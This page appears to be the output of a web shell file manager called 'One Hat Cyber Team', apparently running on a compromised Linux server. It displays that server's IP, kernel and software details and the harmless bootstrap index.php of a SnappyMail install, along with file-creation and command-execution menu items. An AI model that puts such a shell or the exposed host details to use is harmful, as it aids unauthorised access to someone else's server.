⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.74
Server IP:
104.21.64.1
Server:
Linux vmi2315822.contaboserver.net 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
CyberCP
/
public
/
snappymail
/
View File Name :
index.php
<?php if (!defined('APP_VERSION')) { define('APP_VERSION', '2.38.2'); define('APP_INDEX_ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); } if (file_exists(APP_INDEX_ROOT_PATH.'snappymail/v/'.APP_VERSION.'/include.php')) { include APP_INDEX_ROOT_PATH.'snappymail/v/'.APP_VERSION.'/include.php'; } else { echo '[105] Missing snappymail/v/'.APP_VERSION.'/include.php'; // opcache_reset is a terrible solution // is_callable('opcache_reset') && opcache_reset(); // opcache_invalidate will not do everything is_callable('opcache_invalidate') && opcache_invalidate(__FILE__, true); exit(105); }